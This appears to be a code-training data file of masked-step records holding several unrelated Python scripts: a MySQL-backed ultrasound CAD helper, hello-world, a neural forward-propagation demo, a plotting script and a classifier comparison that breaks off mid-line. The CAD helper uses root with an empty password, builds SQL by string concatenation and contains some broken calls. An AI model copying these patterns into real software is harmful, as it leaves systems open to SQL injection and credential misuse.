"step-5": "import numpy as np\r\nimport mysql.connector\r\nfrom mysql.connector import Error\r\nimport matplotlib.pyplot as plt\r\n\r\ndef readData():\r\n connection = mysql.connector.connect(host='localhost',database='cad_ultrasound',user='root',password='')\r\n\r\n sql_select_Query = \"SELECT id_pasien,nama,pathdata FROM datasets\"\r\n cursor = connection.cursor()\r\n cursor.execute(sql_select_Query)\r\n records = cursor.fetchall()\r\n data = records[0]\r\n # nama_pasien = data[1]\r\n filename = data[2]\r\n # dataSignal = np.genfromtxt(r\"C:/xampp/htdocs/projectCAD/storage/app/public/upload/files/\"+filename,delimiter=',')\r\n\r\n ## READ TXT FILE\r\n dataSignal = []\r\n my_file = open(\"C:/xampp/htdocs/projectCAD/public/storage/upload/files/dokter/\" + filename, \"r\")\r\n for line in my_file.readlines():\r\n if line[-1:] == \"\\n\":\r\n dataSignal.append(line[:-1])\r\n else:\r\n dataSignal.append(line)\r\n my_file.close()\r\n\r\n # C:/xampp/htdocs/projectCAD/public/storage/upload/files/hasilproses\r\n\r\n if (connection.is_connected()):\r\n cursor.close()\r\n connection.close()\r\n return dataSignal, filename\r\n\r\ndef saveData(data,label,filename):\r\n connection = mysql.connector.connect(host='localhost', database='cad_ultrasound', user='root', password='')\r\n cursor = connection.cursor()\r\n\r\n filename_hasil = 'hasilproses_'+filename\r\n with open(r'C:\\xampp\\htdocs\\projectCAD\\public\\storage\\upload/files\\hasilproses/' + filename_hasil, 'w') as f:\r\n for row in data:\r\n f.write(str(row) + '\\n')\r\n f.close()\r\n\r\n #Select Pasien from database\r\n sql_select = \"SELECT id_pasien,nama,pathdata FROM datasets\"\r\n cursor.execute(sql_select)\r\n records = cursor.fetchall()\r\n data = records[0]\r\n id_pasien = data[0]\r\n print(label[0])\r\n\r\n sql_update = \"UPDATE pasien SET hasilproses = '\" + filename_hasil + \"',label = '\"+str(label[0])+\"' WHERE id = \"+str(id_pasien)\r\n cursor.execute(sql_update)\r\n connection.commit()\r\n\r\n if (connection.is_connected()):\r\n cursor.close()\r\n connection.close()\r\n\r\n return print(\"sukses\")\r\n\r\ndef getFiturEkstraksi():\r\n connection = mysql.connector.connect(host='localhost',\r\n database='cad_ultrasound',\r\n user='root',\r\n password='')\r\n cursor = connection.cursor()\r\n sql_select_Query = \"SELECT id_pasien,nama,pathdata FROM datasets\"\r\n cursor.execute(sql_select_Query)\r\n fiturname = cursor.fetchall()\r\n fitur = np.genfromtxt(r\"C:/xampp/htdocs/projectCAD/storage/app/public/upload/fitur/\" + fiturname, delimiter=',')\r\n\r\n\r\n if (connection.is_connected()):\r\n cursor.close()\r\n connection.close()\r\n\r\n return fitur\r\n\r\ndef saveFiturEkstraksi(fitur,label):\r\n connection = mysql.connector.connect(host='localhost',\r\n database='cad_ultrasound',\r\n user='root',\r\n password='')\r\n cursor = connection.cursor()\r\n # dbfitur = getFiturEkstraksi()\r\n # dbfitur.append(fitur)\r\n fiturname = 'fitur.txt'\r\n rowfitur = open(\"C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/\"+fiturname, \"w\")\r\n for row in range(len(fitur)):\r\n np.savetxt(rowfitur, row)\r\n rowfitur.close()\r\n\r\n labelname = 'label.txt'\r\n rowlabel = open(\"C:/xampp/htdocs/projectCAD/public/storage/upload/fitur/\"+labelname, \"w\")\r\n for row in range(len(label)):\r\n np.savetxt(rowlabel,row)\r\n rowlabel.close()\r\n\r\n sql_update = \"UPDATE fitur_ekstraksis SET fitur = '\" + fiturname + \"', label = '\" + labelname + \"' WHERE id = 1\"\r\n cursor.execute(sql_update)\r\n connection.commit()\r\n\r\n if (connection.is_connected()):\r\n cursor.close()\r\n connection.close()\r\n\r\n return print(\"sukses\")",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
"""
Prog: helloworld.py
Name: Samuel doyle
Date: 18/04/18
Desc: My first program!
"""
print('Hello, world!')
|
normal
|
{
"blob_id": "513a2bbcf7a63baf900b73b18cf25618937dc7d0",
"index": 1054,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('Hello, world!')\n",
"step-3": "\"\"\"\nProg: helloworld.py\nName: Samuel doyle\nDate: 18/04/18\nDesc: My first program!\n\"\"\"\n\nprint('Hello, world!')\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(weights)
<|reserved_special_token_0|>
print(hidden_layer_vals)
<|reserved_special_token_0|>
print(output_val)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
input_data = np.array([2, 3])
weights = {'node_0': np.array([1, 1]), 'node_1': np.array([-1, 1]),
'output': np.array([2, -1])}
print(weights)
node_0_val = (input_data * weights['node_0']).sum()
node_1_val = (input_data * weights['node_1']).sum()
hidden_layer_vals = np.array([node_0_val, node_1_val])
print(hidden_layer_vals)
output_val = (hidden_layer_vals * weights['output']).sum()
print(output_val)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
import numpy as np
input_data = np.array([2, 3])
weights = {'node_0': np.array([1, 1]), 'node_1': np.array([-1, 1]),
'output': np.array([2, -1])}
print(weights)
node_0_val = (input_data * weights['node_0']).sum()
node_1_val = (input_data * weights['node_1']).sum()
hidden_layer_vals = np.array([node_0_val, node_1_val])
print(hidden_layer_vals)
output_val = (hidden_layer_vals * weights['output']).sum()
print(output_val)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
#manual forward propagation
#based on a course I got from Datacamp.com 'Deep Learning in Python'
#python3 ~/Documents/pyfiles/dl/forward.py
#imports
import numpy as np
#we are going to simulate a neural network forward propagation algorithm
#see the picture forwardPropagation.png for more info
#the basics are it moves from input layer, hidden layer, output layer
#input is data observed or fitted
#hidden is all the behind the scenes way the model works with inputs
#output is the target, the product of processes in the hidden layer
#say we have 2 features in the input layer for a single observation
#those features are numerical, with values 2 and 3
input_data = np.array([2,3])
#from the input layer, interactions between features are represented by nodes in the hidden layer
#the significance of each interaction is denoted by parameters called weights
#weights are directly used to scale the input data into proper significance
#after the initial layer is complete, then the nodes themselves interact with each other
#in the exact same way, each node connects with weights to a new node
#in this case it goes into the output layer after the 2 hidden nodes
#the connections for the nodes to the output have weights too
weights = {'node_0': np.array([1,1]), 'node_1': np.array([-1,1]), 'output': np.array([2,-1])}
print(weights)
#the algorithm for caculating forward propagation is as follows
#(input val1 * weight val1) + (input val2, weight val2)
node_0_val = (input_data*weights['node_0']).sum()
node_1_val = (input_data*weights['node_1']).sum()
#for simplicity, we will hold the entire hidden layer in a variable
hidden_layer_vals = np.array([node_0_val, node_1_val])
print(hidden_layer_vals)
#to calculate to output layer, it works the same way
output_val = (hidden_layer_vals*weights['output']).sum()
print(output_val)
#so here you can see for the given weights those values end up as 9 for the output.
#this is the basis of forward propagation
#output to console
'''
{'output': array([ 2, -1]), 'node_0': array([1, 1]), 'node_1': array([-1, 1])}
[5 1]
9
'''
|
flexible
|
{
"blob_id": "6a09311b5b3b876fd94ed0a9cce30e070528f22c",
"index": 2993,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(weights)\n<mask token>\nprint(hidden_layer_vals)\n<mask token>\nprint(output_val)\n<mask token>\n",
"step-3": "<mask token>\ninput_data = np.array([2, 3])\nweights = {'node_0': np.array([1, 1]), 'node_1': np.array([-1, 1]),\n 'output': np.array([2, -1])}\nprint(weights)\nnode_0_val = (input_data * weights['node_0']).sum()\nnode_1_val = (input_data * weights['node_1']).sum()\nhidden_layer_vals = np.array([node_0_val, node_1_val])\nprint(hidden_layer_vals)\noutput_val = (hidden_layer_vals * weights['output']).sum()\nprint(output_val)\n<mask token>\n",
"step-4": "import numpy as np\ninput_data = np.array([2, 3])\nweights = {'node_0': np.array([1, 1]), 'node_1': np.array([-1, 1]),\n 'output': np.array([2, -1])}\nprint(weights)\nnode_0_val = (input_data * weights['node_0']).sum()\nnode_1_val = (input_data * weights['node_1']).sum()\nhidden_layer_vals = np.array([node_0_val, node_1_val])\nprint(hidden_layer_vals)\noutput_val = (hidden_layer_vals * weights['output']).sum()\nprint(output_val)\n<mask token>\n",
"step-5": "#manual forward propagation\n#based on a course I got from Datacamp.com 'Deep Learning in Python'\n#python3 ~/Documents/pyfiles/dl/forward.py\n\n\n#imports\nimport numpy as np\n\n#we are going to simulate a neural network forward propagation algorithm\n#see the picture forwardPropagation.png for more info\n#the basics are it moves from input layer, hidden layer, output layer\n#input is data observed or fitted\n#hidden is all the behind the scenes way the model works with inputs\n#output is the target, the product of processes in the hidden layer\n\n#say we have 2 features in the input layer for a single observation\n#those features are numerical, with values 2 and 3\ninput_data = np.array([2,3])\n\n#from the input layer, interactions between features are represented by nodes in the hidden layer\n#the significance of each interaction is denoted by parameters called weights\n#weights are directly used to scale the input data into proper significance\n#after the initial layer is complete, then the nodes themselves interact with each other\n#in the exact same way, each node connects with weights to a new node\n#in this case it goes into the output layer after the 2 hidden nodes\n#the connections for the nodes to the output have weights too\nweights = {'node_0': np.array([1,1]), 'node_1': np.array([-1,1]), 'output': np.array([2,-1])}\nprint(weights)\n\n#the algorithm for caculating forward propagation is as follows\n#(input val1 * weight val1) + (input val2, weight val2)\nnode_0_val = (input_data*weights['node_0']).sum()\nnode_1_val = (input_data*weights['node_1']).sum()\n\n#for simplicity, we will hold the entire hidden layer in a variable\nhidden_layer_vals = np.array([node_0_val, node_1_val])\nprint(hidden_layer_vals)\n\n#to calculate to output layer, it works the same way\noutput_val = (hidden_layer_vals*weights['output']).sum()\nprint(output_val)\n\n#so here you can see for the given weights those values end up as 9 for the output.\n#this is the basis of forward propagation\n\n#output to console\n'''\n{'output': array([ 2, -1]), 'node_0': array([1, 1]), 'node_1': array([-1, 1])}\n[5 1]\n9\n'''\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import numpy as np
from scipy import stats
from statarray import statdat
#a2a1 = np.loadtxt('a2a1_130707_2300.dat')
#a2a1 = np.concatenate( (a2a1, np.loadtxt('a2a1_130708_1223.dat')), axis=0 )
#a2a1 = np.loadtxt('a2a1_130708_1654.dat')
#a2a1 = np.loadtxt('a2a1_130709_0030.dat')
import matplotlib.pyplot as plt
import matplotlib
from matplotlib import rc
rc('font',**{'family':'serif'})
# Data file
datfile = 'data001/a2a1_detuning_allelastic.dat'
# Values of nafm for which plots will be shown
nafms = [4,6,8,10,12,16,20,24,32,34,38,40]
cols = 2
rows = len(nafms)/2+len(nafms)%2
figure = plt.figure(figsize=(10.8,3.6*rows))
#figure.suptitle('Bragg')
gs = matplotlib.gridspec.GridSpec( rows,cols, wspace=0.6, hspace=0.42)
import fetchdata
from uncertainties import unumpy
for i,nafm in enumerate(nafms):
detuning = 6.44
a1, a2 = fetchdata.fetch_data_A1A2( {'afmsize':nafm, 'ai':0.}, 'det', datfile )
# Put the units in the cross section
sunits = 9 * (671e-7**2) / 16 / ( np.pi**2)
a1[:,1] = sunits*a1[:,1]
a1[:,2] = sunits*a1[:,2]
a2[:,1] = sunits*a2[:,1]
a2[:,2] = sunits*a2[:,2]
i % len(nafms)
ax = plt.subplot( gs[ i%rows, i/rows] )
ax.set_title('AFM = %d sites' % nafm)
a1s = unumpy.uarray( a1[:,1] , a1[:,2] )
a2s = unumpy.uarray( a2[:,1] , a2[:,2] )
a2a1 = a2s/ a1s
a2a1_mean = unumpy.nominal_values( a2a1 )
a2a1_std = unumpy.std_devs( a2a1)
#ax.errorbar( a1[:,0], a1[:,1], yerr=a1[:,2], \
# capsize=0., elinewidth = 1. ,\
# fmt='.', ecolor='red', mec='red', \
# mew=1., ms=5.,\
# marker='o', mfc='pink', \
# label="A1")
#ax.errorbar( a2[:,0], a2[:,1], yerr=a2[:,2], \
# capsize=0., elinewidth = 1. ,\
# fmt='.', ecolor='green', mec='green', \
# mew=1., ms=5.,\
# marker='o', mfc='limegreen', \
# label="A2")
#ax2 = ax.twinx()
ax.errorbar( a2[:,0], a2a1_mean , yerr=a2a1_std, \
capsize=0., elinewidth = 1. ,\
fmt='.', ecolor='blue', mec='blue', \
mew=1., ms=5.,\
marker='o', mfc='lightblue', \
label="A2/A1")
#ax2.set_ylabel('A2/A1')
ax.set_ylabel('A2/A1')
ax.grid()
ax.set_xlabel('Detuning from state 2 ($\Gamma$)')
#ax.set_ylabel('Cross section (cm$^{2}$)')
if nafm == 40:
ax.set_xlim(-10,10)
#plt.show()
figure.savefig('a2a1_detuning.png', dpi=140)
#pylab.clf()
|
normal
|
{
"blob_id": "feac1092d1aaf70eb4d4df919e434cdc1aa9c826",
"index": 9171,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nrc('font', **{'family': 'serif'})\n<mask token>\nfor i, nafm in enumerate(nafms):\n detuning = 6.44\n a1, a2 = fetchdata.fetch_data_A1A2({'afmsize': nafm, 'ai': 0.0}, 'det',\n datfile)\n sunits = 9 * 6.71e-05 ** 2 / 16 / np.pi ** 2\n a1[:, 1] = sunits * a1[:, 1]\n a1[:, 2] = sunits * a1[:, 2]\n a2[:, 1] = sunits * a2[:, 1]\n a2[:, 2] = sunits * a2[:, 2]\n i % len(nafms)\n ax = plt.subplot(gs[i % rows, i / rows])\n ax.set_title('AFM = %d sites' % nafm)\n a1s = unumpy.uarray(a1[:, 1], a1[:, 2])\n a2s = unumpy.uarray(a2[:, 1], a2[:, 2])\n a2a1 = a2s / a1s\n a2a1_mean = unumpy.nominal_values(a2a1)\n a2a1_std = unumpy.std_devs(a2a1)\n ax.errorbar(a2[:, 0], a2a1_mean, yerr=a2a1_std, capsize=0.0, elinewidth\n =1.0, fmt='.', ecolor='blue', mec='blue', mew=1.0, ms=5.0, marker=\n 'o', mfc='lightblue', label='A2/A1')\n ax.set_ylabel('A2/A1')\n ax.grid()\n ax.set_xlabel('Detuning from state 2 ($\\\\Gamma$)')\n if nafm == 40:\n ax.set_xlim(-10, 10)\nfigure.savefig('a2a1_detuning.png', dpi=140)\n",
"step-3": "<mask token>\nrc('font', **{'family': 'serif'})\ndatfile = 'data001/a2a1_detuning_allelastic.dat'\nnafms = [4, 6, 8, 10, 12, 16, 20, 24, 32, 34, 38, 40]\ncols = 2\nrows = len(nafms) / 2 + len(nafms) % 2\nfigure = plt.figure(figsize=(10.8, 3.6 * rows))\ngs = matplotlib.gridspec.GridSpec(rows, cols, wspace=0.6, hspace=0.42)\n<mask token>\nfor i, nafm in enumerate(nafms):\n detuning = 6.44\n a1, a2 = fetchdata.fetch_data_A1A2({'afmsize': nafm, 'ai': 0.0}, 'det',\n datfile)\n sunits = 9 * 6.71e-05 ** 2 / 16 / np.pi ** 2\n a1[:, 1] = sunits * a1[:, 1]\n a1[:, 2] = sunits * a1[:, 2]\n a2[:, 1] = sunits * a2[:, 1]\n a2[:, 2] = sunits * a2[:, 2]\n i % len(nafms)\n ax = plt.subplot(gs[i % rows, i / rows])\n ax.set_title('AFM = %d sites' % nafm)\n a1s = unumpy.uarray(a1[:, 1], a1[:, 2])\n a2s = unumpy.uarray(a2[:, 1], a2[:, 2])\n a2a1 = a2s / a1s\n a2a1_mean = unumpy.nominal_values(a2a1)\n a2a1_std = unumpy.std_devs(a2a1)\n ax.errorbar(a2[:, 0], a2a1_mean, yerr=a2a1_std, capsize=0.0, elinewidth\n =1.0, fmt='.', ecolor='blue', mec='blue', mew=1.0, ms=5.0, marker=\n 'o', mfc='lightblue', label='A2/A1')\n ax.set_ylabel('A2/A1')\n ax.grid()\n ax.set_xlabel('Detuning from state 2 ($\\\\Gamma$)')\n if nafm == 40:\n ax.set_xlim(-10, 10)\nfigure.savefig('a2a1_detuning.png', dpi=140)\n",
"step-4": "import numpy as np\nfrom scipy import stats\nfrom statarray import statdat\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom matplotlib import rc\nrc('font', **{'family': 'serif'})\ndatfile = 'data001/a2a1_detuning_allelastic.dat'\nnafms = [4, 6, 8, 10, 12, 16, 20, 24, 32, 34, 38, 40]\ncols = 2\nrows = len(nafms) / 2 + len(nafms) % 2\nfigure = plt.figure(figsize=(10.8, 3.6 * rows))\ngs = matplotlib.gridspec.GridSpec(rows, cols, wspace=0.6, hspace=0.42)\nimport fetchdata\nfrom uncertainties import unumpy\nfor i, nafm in enumerate(nafms):\n detuning = 6.44\n a1, a2 = fetchdata.fetch_data_A1A2({'afmsize': nafm, 'ai': 0.0}, 'det',\n datfile)\n sunits = 9 * 6.71e-05 ** 2 / 16 / np.pi ** 2\n a1[:, 1] = sunits * a1[:, 1]\n a1[:, 2] = sunits * a1[:, 2]\n a2[:, 1] = sunits * a2[:, 1]\n a2[:, 2] = sunits * a2[:, 2]\n i % len(nafms)\n ax = plt.subplot(gs[i % rows, i / rows])\n ax.set_title('AFM = %d sites' % nafm)\n a1s = unumpy.uarray(a1[:, 1], a1[:, 2])\n a2s = unumpy.uarray(a2[:, 1], a2[:, 2])\n a2a1 = a2s / a1s\n a2a1_mean = unumpy.nominal_values(a2a1)\n a2a1_std = unumpy.std_devs(a2a1)\n ax.errorbar(a2[:, 0], a2a1_mean, yerr=a2a1_std, capsize=0.0, elinewidth\n =1.0, fmt='.', ecolor='blue', mec='blue', mew=1.0, ms=5.0, marker=\n 'o', mfc='lightblue', label='A2/A1')\n ax.set_ylabel('A2/A1')\n ax.grid()\n ax.set_xlabel('Detuning from state 2 ($\\\\Gamma$)')\n if nafm == 40:\n ax.set_xlim(-10, 10)\nfigure.savefig('a2a1_detuning.png', dpi=140)\n",
"step-5": "\nimport numpy as np\nfrom scipy import stats\nfrom statarray import statdat\n\n#a2a1 = np.loadtxt('a2a1_130707_2300.dat')\n#a2a1 = np.concatenate( (a2a1, np.loadtxt('a2a1_130708_1223.dat')), axis=0 )\n\n#a2a1 = np.loadtxt('a2a1_130708_1654.dat')\n#a2a1 = np.loadtxt('a2a1_130709_0030.dat')\n\n\nimport matplotlib.pyplot as plt\nimport matplotlib\n\nfrom matplotlib import rc\nrc('font',**{'family':'serif'})\n\n\n# Data file\ndatfile = 'data001/a2a1_detuning_allelastic.dat' \n\n# Values of nafm for which plots will be shown\nnafms = [4,6,8,10,12,16,20,24,32,34,38,40]\n\ncols = 2\nrows = len(nafms)/2+len(nafms)%2\n\nfigure = plt.figure(figsize=(10.8,3.6*rows))\n#figure.suptitle('Bragg')\ngs = matplotlib.gridspec.GridSpec( rows,cols, wspace=0.6, hspace=0.42) \n\nimport fetchdata\nfrom uncertainties import unumpy\n\nfor i,nafm in enumerate(nafms):\n detuning = 6.44\n a1, a2 = fetchdata.fetch_data_A1A2( {'afmsize':nafm, 'ai':0.}, 'det', datfile )\n\n # Put the units in the cross section\n sunits = 9 * (671e-7**2) / 16 / ( np.pi**2)\n a1[:,1] = sunits*a1[:,1]\n a1[:,2] = sunits*a1[:,2]\n a2[:,1] = sunits*a2[:,1]\n a2[:,2] = sunits*a2[:,2]\n \n i % len(nafms) \n ax = plt.subplot( gs[ i%rows, i/rows] )\n ax.set_title('AFM = %d sites' % nafm)\n\n a1s = unumpy.uarray( a1[:,1] , a1[:,2] ) \n a2s = unumpy.uarray( a2[:,1] , a2[:,2] )\n\n a2a1 = a2s/ a1s\n \n a2a1_mean = unumpy.nominal_values( a2a1 )\n a2a1_std = unumpy.std_devs( a2a1)\n \n \n #ax.errorbar( a1[:,0], a1[:,1], yerr=a1[:,2], \\\n # capsize=0., elinewidth = 1. ,\\\n # fmt='.', ecolor='red', mec='red', \\\n # mew=1., ms=5.,\\\n # marker='o', mfc='pink', \\\n # label=\"A1\") \n\n #ax.errorbar( a2[:,0], a2[:,1], yerr=a2[:,2], \\\n # capsize=0., elinewidth = 1. ,\\\n # fmt='.', ecolor='green', mec='green', \\\n # mew=1., ms=5.,\\\n # marker='o', mfc='limegreen', \\\n # label=\"A2\") \n\n #ax2 = ax.twinx() \n ax.errorbar( a2[:,0], a2a1_mean , yerr=a2a1_std, \\\n capsize=0., elinewidth = 1. ,\\\n fmt='.', ecolor='blue', mec='blue', \\\n mew=1., ms=5.,\\\n marker='o', mfc='lightblue', \\\n label=\"A2/A1\") \n #ax2.set_ylabel('A2/A1') \n ax.set_ylabel('A2/A1') \n\n ax.grid()\n ax.set_xlabel('Detuning from state 2 ($\\Gamma$)')\n #ax.set_ylabel('Cross section (cm$^{2}$)')\n\n if nafm == 40:\n ax.set_xlim(-10,10)\n\n#plt.show()\nfigure.savefig('a2a1_detuning.png', dpi=140)\n#pylab.clf()\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import glob
import csv
import math
import pandas
# this is used to train the model, try different model, generate the csv file of the result
import pandas
import pandas as pd
import pickle
from sklearn.linear_model import LogisticRegression
from sklearn import metrics
from sklearn import datasets
from sklearn.preprocessing import StandardScaler
import numpy as np
from sklearn.metrics import classification_report, confusion_matrix
import csv
from sklearn.svm import SVC
from sklearn.linear_model import LogisticRegression
from sklearn.linear_model import PassiveAggressiveClassifier
from sklearn.linear_model import RidgeClassifierCV
import attr
# from pycm import *
from sklearn.metrics import f1_score
from sklearn.metrics import matthews_corrcoef
from sklearn.metrics import cohen_kappa_score
from sklearn import tree
from sklearn.neighbors import KNeighborsClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.ensemble import RandomForestClassifier
import numpy as np
# evaluation_path = '/aul/homes/qli027/projects/RNN/evaluation/random/'
# # activity = ['work','go_back_home','baby_present','entertainment','smoke','alexa','others','print','check_body_condition']
# for i in range (0,9):
# with open(evaluation_path + str(i) +'.csv', 'w') as new:
# realnames = ['model','TP','FN','TN','FP']
# writer = csv.DictWriter(new, fieldnames = realnames)
# writer.writeheader()
# new.close()
def naiveBayes(X_train, y_train):
model = GaussianNB()
model = model.fit(X_train, y_train)
return (model)
def knn(X_train, y_train):
model = KNeighborsClassifier()
model = model.fit(X_train, y_train)
return (model)
def decisionTree(X_train, y_train):
model = tree.DecisionTreeClassifier(class_weight='balanced')
model = model.fit(X_train, y_train)
return (model)
def svm_linear(X_train, y_train):
model = SVC(kernel='linear', class_weight='balanced')
model = model.fit(X_train, y_train)
return (model)
def svm_2(X_train, y_train):
model = SVC(kernel='poly', class_weight='balanced', degree=2, random_state=0)
model = model.fit(X_train, y_train)
return (model)
def svm_3(X_train, y_train):
model = SVC(kernel='poly', class_weight='balanced', degree=3, random_state=0)
model = model.fit(X_train, y_train)
return (model)
def svm_4(X_train, y_train):
model = SVC(kernel='poly', class_weight='balanced', degree=4, random_state=0)
model = model.fit(X_train, y_train)
return (model)
def svm_5(X_train, y_train):
model = SVC(kernel='poly', class_weight='balanced', degree=5, random_state=0)
model = model.fit(X_train, y_train)
return (model)
def svm_6(X_train, y_train):
model = SVC(kernel='poly', class_weight='balanced', degree=6, random_state=0)
model = model.fit(X_train, y_train)
return (model)
def svm_7(X_train, y_train):
model = SVC(kernel='poly', class_weight='balanced', degree=7, random_state=0)
model = model.fit(X_train, y_train)
return (model)
def svm_8(X_train, y_train):
model = SVC(kernel='poly', class_weight='balanced', degree=8, random_state=0)
model = model.fit(X_train, y_train)
return (model)
def logisticRegression(X_train, y_train):
model = LogisticRegression(class_weight='balanced')
model = model.fit(X_train, y_train)
return (model)
def passiveAggressiveClassifier(X_train, y_train):
model = PassiveAggressiveClassifier(max_iter=1000, random_state=0, tol=1e-3, class_weight='balanced')
model = model.fit(X_train, y_train)
return (model)
def svm_rbf(X_train, y_train):
model = SVC(kernel='rbf', class_weight='balanced')
model = model.fit(X_train, y_train)
return (model)
def random_forest(X_train, y_train):
model = RandomForestClassifier(n_estimators=100, max_depth=2, random_state=0, class_weight='balanced')
model = model.fit(X_train, y_train)
return (model)
def ridgeClassifierCV(X_train, y_train):
model = RidgeClassifierCV(alphas=[1e-3, 1e-2, 1e-1, 1], class_weight='balanced')
model = model.fit(X_train, y_train)
return (model)
def evaluation_result(y_test, y_pred, model):
cnf_matrix = confusion_matrix(y_test, y_pred, labels=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12])
print(cnf_matrix)
FP = cnf_matrix.sum(axis=0) - np.diag(cnf_matrix)
FN = cnf_matrix.sum(axis=1) - np.diag(cnf_matrix)
TP = np.diag(cnf_matrix)
TN = cnf_matrix.sum() - (FP + FN + TP)
FP = FP.astype(int)
FN = FN.astype(int)
TP = TP.astype(int)
TN = TN.astype(int)
print(TP, TN, FP, FN)
evaluation_path = 'C:/penv/unsw/csvfiles/labeled/count/useractivity/evaluation/'
for i in range(0, 13):
with open(evaluation_path + str(i) + '.csv', 'a') as csvfile:
writer = csv.writer(csvfile)
writer.writerow([model, TP[i], FN[i], TN[i], FP[i]])
csvfile.close()
#
data = pd.read_csv("C:/penv/unsw/csvfiles/labeled/count/useractivity/new.csv")
data = data.dropna()
feature_cols = ['Size', 'Amazon Echo', 'Belkin Motion',
'Belkin Switch', 'Blipcare BloodPressure Meter', 'HP Printer', 'Dropcam', 'Insteon Camera',
'LIFX Smart Bulb', 'NEST Smoke Alarm', 'Netatmo Welcome Camera', 'Netatmo Weather Station',
'PIX-STAR Photo-frame', 'Samsung SmartCam', 'Smart Things', 'TP-Link Day Night Cloud camera',
'TP-Link Smart plug', 'Triby Speaker', 'Withings Smart Baby Monitor', 'Withings Smart scale',
'Withings Aura smart sleep sensor', 'iHome Plug', 'Samsung Galaxy Tab', 'Android Phone 1',
'Laptop', 'MacBook', 'Android Phone 2', 'iPhone', 'MacBook/iPhone']
# feature_cols = [ 'Amazon Echo', 'Belkin Motion',
# 'Belkin Switch','Blipcare BloodPressure Meter','HP Printer','Dropcam','Insteon Camera',
# 'LIFX Smart Bulb', 'NEST Smoke Alarm','Netatmo Welcome Camera', 'Netatmo Weather Station',
# 'PIX-STAR Photo-frame','Samsung SmartCam','Smart Things', 'TP-Link Day Night Cloud camera',
# 'TP-Link Smart plug','Triby Speaker','Withings Smart Baby Monitor','Withings Smart scale',
# 'Withings Aura smart sleep sensor','iHome Plug', 'Samsung Galaxy Tab', 'Android Phone 1',
# 'Laptop', 'MacBook', 'Android Phone 2','iPhone','MacBookiPhone']
# feature_cols = ['Size']
X = data[feature_cols]
scaler = StandardScaler()
X = scaler.fit_transform(X) # Features
y = data['User Activity'] # Target variable
# instantiate the model (using the default parameters)
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30)
# d = [decisionTree, logisticRegression,knn, svm_linear, svm_2,svm_3,svm_rbf,ridgeClassifierCV,naiveBayes,cnn_3layers,random_forest]
model = decisionTree(X_train, y_train)
y_pred = model.predict(X_test)
evaluation_result(y_test, y_pred, 'decisionTree')
model = logisticRegression(X_train, y_train)
y_pred = model.predict(X_test)
evaluation_result(y_test, y_pred, 'logisticRegression')
model = knn(X_train, y_train)
y_pred = model.predict(X_test)
evaluation_result(y_test, y_pred, 'knn')
model = svm_linear(X_train, y_train)
y_pred = model.predict(X_test)
evaluation_result(y_test, y_pred, 'svm_linear')
model = svm_2(X_train, y_train)
y_pred = model.predict(X_test)
evaluation_result(y_test, y_pred, 'svm_2')
model = svm_3(X_train, y_train)
y_pred = model.predict(X_test)
evaluation_result(y_test, y_pred, 'svm_3')
model = svm_rbf(X_train, y_train)
y_pred = model.predict(X_test)
evaluation_result(y_test, y_pred, 'svm_rbf')
model = naiveBayes(X_train, y_train)
y_pred = model.predict(X_test)
evaluation_result(y_test, y_pred, 'naiveBayes')
model = random_forest(X_train, y_train)
y_pred = model.predict(X_test)
evaluation_result(y_test, y_pred, 'random_forest')
model = ridgeClassifierCV(X_train, y_train)
y_pred = model.predict(X_test)
evaluation_result(y_test, y_pred, 'ridgeClassifierCV')
model = passiveAggressiveClassifier(X_train, y_train)
y_pred = model.predict(X_test)
evaluation_result(y_test, y_pred, 'passiveAggressiveClassifier')
|
normal
|
{
"blob_id": "a92384a6abee9e231092ee0e4dbdb60bafcc9979",
"index": 8782,
"step-1": "<mask token>\n\n\ndef naiveBayes(X_train, y_train):\n model = GaussianNB()\n model = model.fit(X_train, y_train)\n return model\n\n\ndef knn(X_train, y_train):\n model = KNeighborsClassifier()\n model = model.fit(X_train, y_train)\n return model\n\n\ndef decisionTree(X_train, y_train):\n model = tree.DecisionTreeClassifier(class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_linear(X_train, y_train):\n model = SVC(kernel='linear', class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\n<mask token>\n\n\ndef svm_3(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=3,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_4(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=4,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef svm_5(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=5,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\n<mask token>\n\n\ndef svm_8(X_train, y_train):\n model = SVC(kernel='poly', class_weight='balanced', degree=8,\n random_state=0)\n model = model.fit(X_train, y_train)\n return model\n\n\ndef logisticRegression(X_train, y_train):\n model = LogisticRegression(class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\n<mask token>\n\n\ndef svm_rbf(X_train, y_train):\n model = SVC(kernel='rbf', class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef random_forest(X_train, y_train):\n model = RandomForestClassifier(n_estimators=100, max_depth=2,\n random_state=0, class_weight='balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef ridgeClassifierCV(X_train, y_train):\n model = RidgeClassifierCV(alphas=[0.001, 0.01, 0.1, 1], class_weight=\n 'balanced')\n model = model.fit(X_train, y_train)\n return model\n\n\ndef 